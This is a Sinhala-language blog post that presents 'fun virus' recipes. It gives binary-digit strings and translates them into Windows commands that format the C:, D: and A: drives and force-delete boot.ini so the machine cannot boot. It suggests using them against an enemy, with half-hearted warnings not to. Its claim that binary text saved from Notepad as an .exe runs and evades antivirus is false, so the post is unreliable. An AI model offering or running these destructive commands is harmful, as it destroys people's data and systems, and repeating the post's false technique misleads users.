Wednesday, September 2, 2020

මෙන්න යාලුවනේ අද මගෙන් ෆන් වයිරස් එකක්

How To Make A Fun Virus........
  අද මම කියලා දෙන්නේ ටිකක් භයානක වැඩ ටිකක්. භයානකයි කිව්වේ මේවා තමන්ගේම පරිගනකයේ කරන්න ගියොත් නම් ලොකුම ලොකු අමාරුවක වැටෙනවා. ඒක නිසා මේවා 
අනිවාර්යෙන්ම කරන්න වෙන්නේ තමන්ගේ හතුරෙකුටම තමයි. එත හතුරෙකුටවත් මේ වගේ දේවල් නම් කරන්න එපා. දැනගෙන ඉන්න මේ වගේ දේවල් කරන්න පුළුවන් කියලා. කොයි වෙලාවක හරි මේ වගේ දේවලුත් ඕනවෙනවා. අපි හමෝම දන්නා Note Pad එක තමයි මේකට අපි
ගන්නේ. මේක ඇත්තටම පොඩි වයිරස් එකක් වගේ. පොඩි උනාට වැඩනම් ගොඩක් ලොකුයි. මොකද මේවා වයිරස් ගාඩ් ඒකෙන් වයිරස් කියලා අල්ලන්නේ නෑ. එහෙනම් වැඩේ පටන් ගමු නේද ?



 මේ code Note Pad එකේ ලියලා Save as ගිහින් .exe විදියට Save කරගන්න ඕන. ඒක Double Click කලොත් නම් එකේ ලියලා තියෙන දේවල් Run වෙන්න පටන් ගන්නවා. මෙන්න එහෙනම් code ටික.

01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
මේ  code එකෙන් මෙන්න මේ දේ සිද්ද වෙනවා. format c:\ /Q/X   වෙන දේ කියන්න ඕන නෑනේ. කමක් නෑ කියන්නම්. කෙලින්ම c: drive එක ෆෝමැට් වෙනවා.
තව තියෙනවා.

 01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
මේකෙන් D: එක  


01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
මේකෙන් A: එක  


01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
මේක  මෙන්න ම විදියට del /F/S/Q c:\boot.ini මේකෙන් boot.ini එක මැකෙනවා. එහෙම උනාම පරිගණකය boot වෙන්නේ නැතිව යනවා.


නැවත  වතාවක් මම මම කියන්නේ මේවා තමන්ගේ පරිගණක වල කරන්න උත්සහ කරන්න එපා. මෙහෙම දේවල් කරන්න පුළුවන් කියලා විතරයි මම කියන්නේ. මොකුත් නැති partition එකකට මේවා කරලා බලන්න පුළුවන් කැමතිනම්.

No comments:

Post a Comment